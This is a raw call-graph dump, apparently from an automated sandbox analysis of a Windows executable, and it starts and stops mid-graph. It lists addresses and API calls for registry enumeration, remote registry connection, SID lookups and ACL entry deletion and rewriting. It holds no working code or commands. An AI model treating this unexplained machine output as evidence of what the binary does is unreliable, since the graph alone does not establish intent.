7ff7c1713f80 35 API calls 41268->41270 41296 7ff7c172a591 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41268->41296 41269 7ff7c172a48d 41276 7ff7c1713f80 35 API calls 41269->41276 41412 7ff7c172b512 41269->41412 41270->41296 41271 7ff7c172a64c 41274 7ff7c1713f80 35 API calls 41271->41274 41272 7ff7c172a664 41273 7ff7c1713f80 35 API calls 41272->41273 41275 7ff7c172a68e Concurrency::details::platform::DefaultWaiterPool::get_waiter 41273->41275 41295 7ff7c172a65f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41274->41295 41280 7ff7c172b703 41275->41280 41282 7ff7c172b6fe 41275->41282 41284 7ff7c1713f80 35 API calls 41275->41284 41289 7ff7c172a4fa Concurrency::details::platform::DefaultWaiterPool::get_waiter 41276->41289 41278 7ff7c172b6b4 41915 7ff7c1714230 31 API calls 2 library calls 41278->41915 41279 7ff7c1740c18 13 API calls 41314 7ff7c172a788 41279->41314 41283 7ff7c1709910 33 API calls 41280->41283 41286 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41282->41286 41287 7ff7c172b709 41283->41287 41288 7ff7c172a72c 41284->41288 41285 7ff7c172b6be 41916 7ff7c1714230 31 API calls 2 library calls 41285->41916 41286->41280 41294 7ff7c1709520 35 API calls 41287->41294 41288->41282 41288->41295 41289->41280 41289->41282 41291 7ff7c1713f80 35 API calls 41289->41291 41291->41296 41292 7ff7c172b6c8 41917 7ff7c1714230 31 API calls 2 library calls 41292->41917 41298 7ff7c172b76e 41294->41298 41295->41279 41296->41271 41296->41272 41296->41282 41297 7ff7c172b6d2 41299 7ff7c1742180 _handle_error 8 API calls 41297->41299 41594 7ff7c172bc40 41298->41594 41300 7ff7c172b6e3 41299->41300 41300->41155 41302 7ff7c172bba4 41984 7ff7c1709720 31 API calls 2 library calls 41302->41984 41304 7ff7c172a840 41307 7ff7c1740c18 13 API calls 41304->41307 41368 7ff7c172aa87 41304->41368 41305 7ff7c170c870 69 API calls 41305->41314 41306 7ff7c172a350 249 API calls 41308 7ff7c172b7ad 41306->41308 41355 7ff7c172a8a5 41307->41355 41308->41302 41309 7ff7c172b7b7 41308->41309 41310 7ff7c17421d4 std::_Facet_Register 5 API calls 41309->41310 41315 7ff7c172b7c9 memcpy_s 41310->41315 41311 7ff7c172bc26 41313 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41311->41313 41312 7ff7c1742180 _handle_error 8 API calls 41316 7ff7c172bc06 41312->41316 41317 7ff7c172bc2c 41313->41317 41314->41304 41314->41305 41322 7ff7c172b7eb RegEnumKeyExW 41315->41322 41316->41155 41324 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41317->41324 41318 7ff7c172ab79 41320 7ff7c1713f80 35 API calls 41318->41320 41319 7ff7c172ab9b 41321 7ff7c1740c18 13 API calls 41319->41321 41323 7ff7c172ab8f Concurrency::details::SchedulerBase::GetBitSet SimpleUString::operator= 41320->41323 41373 7ff7c172aba2 41321->41373 41347 7ff7c172b81f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41322->41347 41344 7ff7c172b4a0 41323->41344 41323->41412 41903 7ff7c1709d90 35 API calls 41323->41903 41325 7ff7c172bc32 41324->41325 41330 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41325->41330 41326 7ff7c172b920 41328 7ff7c172b9df 41326->41328 41329 7ff7c172b930 41326->41329 41327 7ff7c172a960 41333 7ff7c1740c18 13 API calls 41327->41333 41327->41368 41332 7ff7c172b9eb RegCloseKey 41328->41332 41378 7ff7c172b9f1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41328->41378 41334 7ff7c172b93c 41329->41334 41335 7ff7c172b935 RegCloseKey 41329->41335 41336 7ff7c172bc38 41330->41336 41332->41378 41386 7ff7c172a9c5 41333->41386 41340 7ff7c172b971 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41334->41340 41350 7ff7c172bc21 41334->41350 41335->41334 41985 7ff7c1713e30 33 API calls 41336->41985 41337 7ff7c1713f80 35 API calls 41337->41347 41338 7ff7c172b488 41904 7ff7c1709420 31 API calls 2 library calls 41338->41904 41339 7ff7c172bb05 41341 7ff7c172bb3c Concurrency::details::platform::DefaultWaiterPool::get_waiter 41339->41341 41339->41350 41919 7ff7c1709720 31 API calls 2 library calls 41340->41919 41983 7ff7c1709720 31 API calls 2 library calls 41341->41983 41365 7ff7c172b4eb 41344->41365 41906 7ff7c1709cb0 35 API calls 41344->41906 41347->41317 41347->41326 41347->41337 41358 7ff7c172b8e6 RegEnumKeyExW 41347->41358 41918 7ff7c1710360 35 API calls 3 library calls 41347->41918 41348 7ff7c172b497 41905 7ff7c1714230 31 API calls 2 library calls 41348->41905 41349 7ff7c170c870 69 API calls 41349->41355 41356 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41350->41356 41355->41327 41355->41349 41356->41311 41357 7ff7c172b986 41357->41311 41362 7ff7c172b9be Concurrency::details::platform::DefaultWaiterPool::get_waiter 41357->41362 41358->41347 41360 7ff7c172ac60 41364 7ff7c1740c18 13 API calls 41360->41364 41382 7ff7c172aea7 41360->41382 41361 7ff7c170c870 69 API calls 41361->41373 41362->41312 41363 7ff7c172b4d5 41907 7ff7c1714230 31 API calls 2 library calls 41363->41907 41395 7ff7c172acc5 41364->41395 41366 7ff7c172b54c 41365->41366 41369 7ff7c172b526 RegConnectRegistryW 41365->41369 41365->41412 41374 7ff7c172b55f RegOpenKeyExW 41366->41374 41368->41318 41368->41319 41369->41366 41369->41412 41371 7ff7c170c870 69 API calls 41371->41386 41373->41360 41373->41361 41377 7ff7c172b58b 41374->41377 41375 7ff7c172af99 41379 7ff7c1713f80 35 API calls 41375->41379 41376 7ff7c172afbb 41380 7ff7c1740c18 13 API calls 41376->41380 41381 7ff7c172b676 41377->41381 41384 7ff7c172b5a7 RegCreateKeyExW 41377->41384 41378->41325 41378->41336 41378->41339 41920 7ff7c170aa20 41378->41920 41931 7ff7c170ac70 41378->41931 41936 7ff7c172b710 41378->41936 41379->41323 41397 7ff7c172afc2 41380->41397 41383 7ff7c172b68e RegCloseKey 41381->41383 41381->41412 41382->41375 41382->41376 41383->41412 41388 7ff7c172b652 41384->41388 41389 7ff7c172b5e6 41384->41389 41385 7ff7c172ad80 41385->41382 41390 7ff7c1740c18 13 API calls 41385->41390 41386->41368 41386->41371 41387 7ff7c170c870 69 API calls 41387->41395 41388->41381 41392 7ff7c172b65f RegCloseKey 41388->41392 41908 7ff7c1709cb0 35 API calls 41389->41908 41393 7ff7c172ade5 41390->41393 41392->41381 41393->41382 41403 7ff7c170c870 69 API calls 41393->41403 41394 7ff7c172b5f9 41909 7ff7c1709d20 35 API calls 41394->41909 41395->41385 41395->41387 41404 7ff7c170c870 69 API calls 41397->41404 41417 7ff7c172b080 41397->41417 41398 7ff7c172b60d 41910 7ff7c17094c0 35 API calls 41398->41910 41400 7ff7c1740c18 13 API calls 41422 7ff7c172b0e5 41400->41422 41401 7ff7c172b620 41911 7ff7c1714230 31 API calls 2 library calls 41401->41911 41403->41393 41404->41397 41405 7ff7c172b637 41912 7ff7c1714230 31 API calls 2 library calls 41405->41912 41407 7ff7c1740c18 13 API calls 41409 7ff7c172b386 41407->41409 41408 7ff7c172b641 41913 7ff7c1714230 31 API calls 2 library calls 41408->41913 41900 7ff7c1709b00 69 API calls 41409->41900 41914 7ff7c1714230 31 API calls 2 library calls 41412->41914 41413 7ff7c172b3aa 41413->41323 41415 7ff7c1740c18 13 API calls 41413->41415 41414 7ff7c172b1a0 41416 7ff7c1740c18 13 API calls 41414->41416 41426 7ff7c172b2c0 Concurrency::details::SchedulerBase::GetBitSet 41414->41426 41418 7ff7c172b3b5 41415->41418 41428 7ff7c172b205 41416->41428 41417->41400 41417->41426 41901 7ff7c1709b00 69 API calls 41418->41901 41420 7ff7c172b3d9 41420->41323 41423 7ff7c1740c18 13 API calls 41420->41423 41421 7ff7c170c870 69 API calls 41421->41422 41422->41414 41422->41421 41424 7ff7c172b3e4 41423->41424 41902 7ff7c1709b00 69 API calls 41424->41902 41426->41323 41426->41407 41427 7ff7c170c870 69 API calls 41427->41428 41428->41426 41428->41427 41431 7ff7c1742189 41430->41431 41432 7ff7c17243c0 41431->41432 41433 7ff7c1742b14 IsProcessorFeaturePresent 41431->41433 41434 7ff7c1742b2c 41433->41434 42064 7ff7c1742d08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41434->42064 41436 7ff7c1742b3f 42065 7ff7c1742ae0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41436->42065 42066 7ff7c174882c 31 API calls 2 library calls 41439->42066 41441 7ff7c1748915 42067 7ff7c174892c IsProcessorFeaturePresent 41441->42067 41445 7ff7c1740c18 13 API calls 41444->41445 41446 7ff7c173f9e9 41445->41446 41448 7ff7c170c870 69 API calls 41446->41448 41449 7ff7c173faa2 41446->41449 41447 7ff7c1740c18 13 API calls 41451 7ff7c173fb3b 41447->41451 41448->41446 41449->41447 41472 7ff7c173e706 41449->41472 41450 7ff7c170c870 69 API calls 41450->41451 41451->41450 41453 7ff7c173fbf0 41451->41453 41452 7ff7c1740c18 13 API calls 41455 7ff7c173fc89 41452->41455 41453->41452 41453->41472 41454 7ff7c170c870 69 API calls 41454->41455 41455->41454 41457 7ff7c173fd40 41455->41457 41456 7ff7c1740c18 13 API calls 41458 7ff7c173fdd9 41456->41458 41457->41456 41457->41472 41460 7ff7c170c870 69 API calls 41458->41460 41461 7ff7c173fe90 41458->41461 41459 7ff7c1740c18 13 API calls 41462 7ff7c173ff29 41459->41462 41460->41458 41461->41459 41461->41472 41464 7ff7c170c870 69 API calls 41462->41464 41465 7ff7c173ffe0 41462->41465 41463 7ff7c1740c18 13 API calls 41466 7ff7c1740079 41463->41466 41464->41462 41465->41463 41465->41472 41468 7ff7c170c870 69 API calls 41466->41468 41469 7ff7c1740130 41466->41469 41467 7ff7c1740c18 13 API calls 41471 7ff7c17401c9 41467->41471 41468->41466 41469->41467 41469->41472 41470 7ff7c170c870 69 API calls 41470->41471 41471->41470 41471->41472 41472->41192 41474 7ff7c1713f80 35 API calls 41473->41474 41475 7ff7c1714791 41474->41475 41535 7ff7c174e3a4 41475->41535 41478 7ff7c1713f80 35 API calls 41479 7ff7c17147e3 ctype 41478->41479 41479->41197 41481 7ff7c173f3ea LookupAccountNameW GetLastError 41480->41481 41483 7ff7c173f469 41481->41483 41484 7ff7c173f45e GetLastError 41481->41484 41485 7ff7c173f4a4 memcpy_s 41483->41485 41487 7ff7c173f4bb 41483->41487 41489 7ff7c173f492 41483->41489 41500 7ff7c173f61f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41484->41500 41498 7ff7c173f5f0 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41485->41498 41566 7ff7c1715790 35 API calls 3 library calls 41485->41566 41488 7ff7c17421d4 std::_Facet_Register 5 API calls 41487->41488 41488->41485 41490 7ff7c173f653 Concurrency::cancel_current_task 41489->41490 41560 7ff7c17421d4 41489->41560 41492 7ff7c173f4f7 LookupAccountNameW 41494 7ff7c173f557 GetLastError 41492->41494 41495 7ff7c173f561 41492->41495 41501 7ff7c173f5b7 41494->41501 41499 7ff7c1713f80 35 API calls 41495->41499 41496 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41497 7ff7c173f652 41496->41497 41497->41490 41498->41496 41498->41500 41502 7ff7c173f586 41499->41502 41500->41224 41501->41498 41503 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41501->41503 41502->41501 41504 7ff7c173f590 IsValidSid 41502->41504 41503->41498 41504->41501 41505 7ff7c173f59d ctype 41504->41505 41567 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41505->41567 41507->41187 41570 7ff7c174125c 41508->41570 41510 7ff7c1740c3a 41512 7ff7c1740c5d ctype 41510->41512 41578 7ff7c1740e14 5 API calls std::_Facet_Register 41510->41578 41574 7ff7c17412d4 41512->41574 41513 7ff7c1740c52 41579 7ff7c1740e44 EncodePointer std::locale::_Setgloballocale 41513->41579 41516 7ff7c173e7b9 41517 7ff7c1715cf0 69 API calls 41516->41517 41517->41215 41521 7ff7c170954d 41518->41521 41519 7ff7c170955b ctype 41519->41220 41520 7ff7c170960c Concurrency::cancel_current_task 41581 7ff7c1708e00 31 API calls 2 library calls 41520->41581 41521->41519 41521->41520 41523 7ff7c170959f 41521->41523 41524 7ff7c17095c6 41521->41524 41523->41520 41525 7ff7c17421d4 std::_Facet_Register 5 API calls 41523->41525 41524->41519 41526 7ff7c17421d4 std::_Facet_Register 5 API calls 41524->41526 41528 7ff7c17095b0 41525->41528 41526->41519 41527 7ff7c1709634 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41527->41220 41528->41519 41529 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41528->41529 41530 7ff7c170960b 41529->41530 41530->41520 41531->41244 41582 7ff7c1741034 33 API calls Concurrency::cancel_current_task 41532->41582 41538 7ff7c174e218 41535->41538 41559 7ff7c174f264 EnterCriticalSection 41538->41559 41540 7ff7c174e244 41541 7ff7c174e24c 41540->41541 41544 7ff7c174e26f 41540->41544 41542 7ff7c174e1f8 _Wcrtomb 14 API calls 41541->41542 41543 7ff7c174e251 41542->41543 41546 7ff7c17488dc _invalid_parameter_noinfo 31 API calls 41543->41546 41545 7ff7c174e30c 39 API calls 41544->41545 41549 7ff7c174e277 41545->41549 41554 7ff7c174e25d 41546->41554 41547 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 41548 7ff7c17147b7 41547->41548 41548->41478 41548->41479 41550 7ff7c174e2b4 41549->41550 41551 7ff7c174e2a4 41549->41551 41549->41554 41553 7ff7c1755174 _Getctype 31 API calls 41550->41553 41552 7ff7c174e1f8 _Wcrtomb 14 API calls 41551->41552 41552->41554 41555 7ff7c174e2c2 41553->41555 41554->41547 41555->41554 41556 7ff7c174e2f5 41555->41556 41557 7ff7c174892c _invalid_parameter_noinfo_noreturn 17 API calls 41556->41557 41558 7ff7c174e309 41557->41558 41564 7ff7c17421df 41560->41564 41561 7ff7c17421f8 41561->41485 41563 7ff7c174220a Concurrency::cancel_current_task 41563->41564 41564->41560 41564->41561 41564->41563 41568 7ff7c17524d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 41564->41568 41569 7ff7c1740ff0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 41564->41569 41566->41492 41567->41501 41568->41564 41571 7ff7c174126b 41570->41571 41572 7ff7c1741270 41570->41572 41580 7ff7c174f2d4 6 API calls std::_Lockit::_Lockit 41571->41580 41572->41510 41575 7ff7c17412e8 41574->41575 41576 7ff7c17412df LeaveCriticalSection 41574->41576 41575->41516 41578->41513 41579->41512 41581->41527 41585 7ff7c171c48e ctype 41584->41585 41986 7ff7c171c5b0 41585->41986 41587 7ff7c171c519 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41588 7ff7c1742180 _handle_error 8 API calls 41587->41588 41589 7ff7c171c594 41588->41589 41589->41264 41591 7ff7c17344ff 41590->41591 41592 7ff7c170c870 69 API calls 41591->41592 41593 7ff7c172a45d 41591->41593 41592->41591 41593->41268 41593->41269 41595 7ff7c172bd59 41594->41595 41596 7ff7c172bd43 IsValidSid 41594->41596 41599 7ff7c172bd7c IsValidSid 41595->41599 41600 7ff7c172bd92 41595->41600 41596->41595 41597 7ff7c172bd4d 41596->41597 42010 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41597->42010 41599->41600 41601 7ff7c172bd86 41599->41601 41603 7ff7c1709520 35 API calls 41600->41603 41656 7ff7c172c031 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41600->41656 42011 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41601->42011 41605 7ff7c172bdbf 41603->41605 41604 7ff7c1709520 35 API calls 41606 7ff7c172c0e9 41604->41606 41608 7ff7c1709520 35 API calls 41605->41608 41990 7ff7c1724440 41606->41990 41609 7ff7c172bdd3 41608->41609 41613 7ff7c171c460 8 API calls 41609->41613 41610 7ff7c172e472 42049 7ff7c1713e30 33 API calls 41610->42049 41611 7ff7c172e45a 42048 7ff7c1713e30 33 API calls 41611->42048 41618 7ff7c172be2b 41613->41618 41616 7ff7c170aa20 35 API calls 41621 7ff7c172c36f 41616->41621 41617 7ff7c172e478 41624 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41617->41624 41629 7ff7c171c460 8 API calls 41618->41629 41619 7ff7c170aa20 35 API calls 41622 7ff7c172c14b 41619->41622 41620 7ff7c172e460 41626 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41620->41626 41623 7ff7c170ac70 35 API calls 41621->41623 41625 7ff7c170ac70 35 API calls 41622->41625 41627 7ff7c172c38b 41623->41627 41628 7ff7c172e47e 41624->41628 41630 7ff7c172c165 41625->41630 41631 7ff7c172e466 41626->41631 41632 7ff7c1713f80 35 API calls 41627->41632 41635 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41628->41635 41633 7ff7c172be7a 41629->41633 41634 7ff7c1713f80 35 API calls 41630->41634 41637 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41631->41637 41669 7ff7c172c3eb Concurrency::details::platform::DefaultWaiterPool::get_waiter 41632->41669 41636 7ff7c1740c18 13 API calls 41633->41636 41647 7ff7c172c1c2 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41634->41647 41638 7ff7c172e484 41635->41638 41639 7ff7c172be84 41636->41639 41640 7ff7c172e46c 41637->41640 41642 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41638->41642 42012 7ff7c1715cf0 69 API calls 41639->42012 41641 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41640->41641 41641->41610 41643 7ff7c172e48a 41642->41643 42050 7ff7c1713e30 33 API calls 41643->42050 41646 7ff7c172e490 41649 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41646->41649 41647->41620 41647->41631 41647->41640 42015 7ff7c1736970 33 API calls 4 library calls 41647->42015 41652 7ff7c172e496 41649->41652 41650 7ff7c172c2de 42016 7ff7c1736970 33 API calls 4 library calls 41650->42016 41651 7ff7c172beb8 41651->41656 41662 7ff7c172beeb Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41651->41662 41657 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41652->41657 41654 7ff7c172c2e8 41654->41610 41654->41616 41780 7ff7c172c00f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41654->41780 41899 7ff7c172e424 41654->41899 41655 7ff7c172e44e 41659 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41655->41659 41656->41604 41656->41655 41658 7ff7c172e454 41656->41658 41660 7ff7c172e49c 41657->41660 41661 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41658->41661 41659->41658 41666 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41660->41666 41661->41611 41662->41655 41662->41658 42013 7ff7c1736970 33 API calls 4 library calls 41662->42013 41663 7ff7c1742180 _handle_error 8 API calls 41665 7ff7c172b779 41663->41665 41665->41302 41665->41306 41671 7ff7c172e4a2 41666->41671 41667 7ff7c172bfcc 42014 7ff7c1736970 33 API calls 4 library calls 41667->42014 41668 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41673 7ff7c172e42a 41668->41673 41669->41617 41669->41628 41669->41638 41670 7ff7c1709520 35 API calls 41669->41670 41674 7ff7c172c803 41670->41674 41676 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41671->41676 41677 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41673->41677 41680 7ff7c172cd69 41674->41680 41681 7ff7c172c83b 41674->41681 41675 7ff7c172bfd6 41682 7ff7c172e448 41675->41682 41675->41780 41679 7ff7c172e4a8 41676->41679 41678 7ff7c172e430 41677->41678 41683 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41678->41683 41687 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41679->41687 41690 7ff7c1709520 35 API calls 41680->41690 41783 7ff7c172cdc2 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41680->41783 41685 7ff7c172cadc 41681->41685 41686 7ff7c172c84f 41681->41686 41684 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41682->41684 41688 7ff7c172e436 41683->41688 41684->41655 42019 7ff7c171bf60 45 API calls 4 library calls 41685->42019 42017 7ff7c171bf60 45 API calls 4 library calls 41686->42017 41692 7ff7c172e4ae 41687->41692 41700 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41688->41700 41696 7ff7c172cda9 41690->41696 42051 7ff7c1713e30 33 API calls 41692->42051 41693 7ff7c172c854 41693->41643 41709 7ff7c170aa20 35 API calls 41693->41709 41694 7ff7c172d0de 41705 7ff7c172d1a2 41694->41705 41706 7ff7c172d110 GetAclInformation 41694->41706 41786 7ff7c172d272 41694->41786 41695 7ff7c172cae1 41695->41692 41710 7ff7c170aa20 35 API calls 41695->41710 42021 7ff7c17150c0 72 API calls 3 library calls 41696->42021 41698 7ff7c172cf6c GetAclInformation 41702 7ff7c172cf8b GetLastError 41698->41702 41723 7ff7c172cf9f 41698->41723 41699 7ff7c172ce3c 41699->41694 41720 7ff7c172d02b GetAclInformation 41699->41720 41704 7ff7c172e43c 41700->41704 41708 7ff7c172e354 LocalFree LocalFree 41702->41708 41703 7ff7c172e4b4 41714 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41703->41714 41718 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41704->41718 41719 7ff7c172d1d3 GetAclInformation 41705->41719 41705->41786 41712 7ff7c172d12c GetLastError 41706->41712 41734 7ff7c172d140 41706->41734 41707 7ff7c172cdba 41716 7ff7c1709520 35 API calls 41707->41716 41707->41783 41726 7ff7c172e377 ctype 41708->41726 41715 7ff7c172c8a6 41709->41715 41721 7ff7c172cb33 41710->41721 41711 7ff7c172d2b8 GetAclInformation 41722 7ff7c172d2d7 GetLastError 41711->41722 41754 7ff7c172d2eb 41711->41754 41712->41708 41713 7ff7c172cfc0 GetAce 41713->41702 41713->41723 41724 7ff7c172e4ba 41714->41724 41725 7ff7c170ac70 35 API calls 41715->41725 41716->41783 41717 7ff7c172d38a GetAclInformation 41727 7ff7c172d3a8 GetLastError 41717->41727 41758 7ff7c172d3bc 41717->41758 41728 7ff7c172e442 41718->41728 41729 7ff7c172d1ef GetLastError 41719->41729 41785 7ff7c172d203 41719->41785 41730 7ff7c172d047 GetLastError 41720->41730 41787 7ff7c172d06f 41720->41787 41731 7ff7c170ac70 35 API calls 41721->41731 41722->41708 41723->41699 41723->41713 41735 7ff7c172cfdf DeleteAce 41723->41735 41744 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41724->41744 41736 7ff7c172c8c0 41725->41736 42046 7ff7c1736970 33 API calls 4 library calls 41726->42046 41727->41708 41746 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41728->41746 41729->41708 41730->41708 41738 7ff7c172cb4d 41731->41738 41732 7ff7c172d44c 41740 7ff7c172d47e 41732->41740 41800 7ff7c172c937 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41732->41800 42025 7ff7c1739d50 69 API calls 4 library calls 41732->42025 41733 7ff7c172d160 GetAce 41733->41702 41733->41734 41734->41705 41734->41733 41742 7ff7c172d183 DeleteAce 41734->41742 41735->41723 41743 7ff7c172d05b GetLastError 41735->41743 42018 7ff7c171a1f0 33 API calls 41736->42018 42020 7ff7c171a1f0 33 API calls 41738->42020 41739 7ff7c172d382 41739->41732 42024 7ff7c1739d50 69 API calls 4 library calls 41739->42024 41753 7ff7c172d59d ctype 41740->41753 41761 7ff7c172d4b2 41740->41761 41740->41800 42026 7ff7c1739830 50 API calls 2 library calls 41740->42026 41741 7ff7c172d300 GetAce 41741->41702 41741->41754 41742->41734 41742->41743 41743->41708 41755 7ff7c172e4c0 41744->41755 41746->41682 41747 7ff7c172e397 42047 7ff7c1736970 33 API calls 4 library calls 41747->42047 41748 7ff7c172d3d0 GetAce 41748->41702 41748->41758 41749 7ff7c172d220 GetAce 41749->41702 41749->41785 41750 7ff7c172d090 GetAce 41750->41702 41750->41787 41765 7ff7c172d5f7 41753->41765 41794 7ff7c172d7ac ctype 41753->41794 42031 7ff7c1738360 155 API calls 4 library calls 41753->42031 41754->41741 41762 7ff7c172d32b DeleteAce 41754->41762 41764 7ff7c172d2ae 41754->41764 41774 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41755->41774 41758->41739 41758->41748 41768 7ff7c172d3fb DeleteAce 41758->41768 41761->41753 41772 7ff7c172d4e3 41761->41772 41761->41800 42027 7ff7c1739830 50 API calls 2 library calls 41761->42027 41762->41743 41762->41754 41764->41717 41764->41739 41765->41794 41765->41800 41826 7ff7c172d628 41765->41826 42032 7ff7c1738360 155 API calls 4 library calls 41765->42032 41767 7ff7c172e3a1 41767->41728 41767->41780 41768->41743 41768->41758 41772->41753 41772->41800 42028 7ff7c1739b10 13 API calls ctype 41772->42028 41777 7ff7c172e4c6 41774->41777 41775 7ff7c172d942 SetEntriesInAclW 41778 7ff7c172dc10 SetEntriesInAclW 41775->41778 41779 7ff7c172d964 41775->41779 41793 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41777->41793 41788 7ff7c172dee2 41778->41788 41789 7ff7c172dc36 41778->41789 41779->41800 42035 7ff7c171bf60 45 API calls 4 library calls 41779->42035 41780->41663 41781 7ff7c172d253 DeleteAce 41781->41743 41781->41785 41782 7ff7c172d0c3 DeleteAce 41782->41743 41782->41787 41783->41673 41783->41694 41783->41698 41783->41699 41785->41749 41785->41781 41785->41786 42023 7ff7c17339c0 13 API calls _handle_error 41785->42023 41786->41711 41786->41764 41787->41694 41787->41750 41787->41782 42022 7ff7c17339c0 13 API calls _handle_error 41787->42022 41790 7ff7c172def1 41788->41790 41791 7ff7c172dfa4 41788->41791 41789->41800 42037 7ff7c171bf60 45 API calls 4 library calls 41789->42037 41796 7ff7c172df1a 41790->41796 41797 7ff7c172df05 IsValidSid 41790->41797 41805 7ff7c172dfd8 41791->41805 41806 7ff7c172dfc3 IsValidSid 41791->41806 41857 7ff7c172df9f 41791->41857 41799 7ff7c172e4cc 41793->41799 41794->41775 41794->41800 41810 7ff7c172df4b 41796->41810 41811 7ff7c172df36 IsValidSid 41796->41811 41797->41796 41804 7ff7c172df12 41797->41804 41798 7ff7c172d527 41798->41800 41818 7ff7c172d541 IsValidSid 41798->41818 41833 7ff7c172d554 ctype 41798->41833 41812 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41799->41812 41800->41646 41800->41652 41800->41660 41800->41671 41800->41679 41800->41703 41800->41708 41800->41724 41800->41755 41800->41777 41800->41799 41801 7ff7c172d739 41816 7ff7c172d74c IsValidSid 41801->41816 41817 7ff7c172d75f ctype 41801->41817 41802 7ff7c172d97e 41808 7ff7c172e4d2 41802->41808 41827 7ff7c170aa20 35 API calls 41802->41827 42039 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41804->42039 41823 7ff7c172e009 41805->41823 41824 7ff7c172dff4 IsValidSid 41805->41824 41806->41805 41814 7ff7c172dfd0 41806->41814 41807 7ff7c172dc50 41815 7ff7c172e4f0 41807->41815 41835 7ff7c170aa20 35 API calls 41807->41835 42052 7ff7c1713e30 33 API calls 41808->42052 41834 7ff7c1709520 35 API calls 41810->41834 41811->41810 41819 7ff7c172df43 41811->41819 41812->41808 42042 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41814->42042 42053 7ff7c1713e30 33 API calls 41815->42053 41816->41817 41828 7ff7c172d756 41816->41828 41817->41794 41830 7ff7c172d799 IsValidSid 41817->41830 41831 7ff7c172d54b 41818->41831 41818->41833 42040 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41819->42040 41848 7ff7c1709520 35 API calls 41823->41848 41824->41823 41837 7ff7c172e001 41824->41837 41826->41794 41826->41800 41826->41801 41839 7ff7c1739200 117 API calls 41826->41839 41840 7ff7c172d9d2 41827->41840 42033 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41828->42033 41830->41794 41841 7ff7c172d7a3 41830->41841 42029 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41831->42029 41833->41753 41845 7ff7c172d58a IsValidSid 41833->41845 41844 7ff7c172df74 41834->41844 41846 7ff7c172dca4 41835->41846 42043 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41837->42043 41838 7ff7c172e09e 41849 7ff7c172e50e 41838->41849 41864 7ff7c170aa20 35 API calls 41838->41864 41839->41826 41850 7ff7c170ac70 35 API calls 41840->41850 42034 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41841->42034 42041 7ff7c1738010 42 API calls 4 library calls 41844->42041 41845->41753 41854 7ff7c172d594 41845->41854 41855 7ff7c170ac70 35 API calls 41846->41855 41848->41857 42054 7ff7c1713e30 33 API calls 41849->42054 41859 7ff7c172d9ea 41850->41859 42030 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41854->42030 41861 7ff7c172dcbc 41855->41861 41857->41800 42044 7ff7c171bf60 45 API calls 4 library calls 41857->42044 42036 7ff7c171a1f0 33 API calls 41859->42036 42038 7ff7c171a1f0 33 API calls 41861->42038 41868 7ff7c172e0f0 41864->41868 41874 7ff7c170ac70 35 API calls 41868->41874 41879 7ff7c172e10a 41874->41879 42045 7ff7c171a1f0 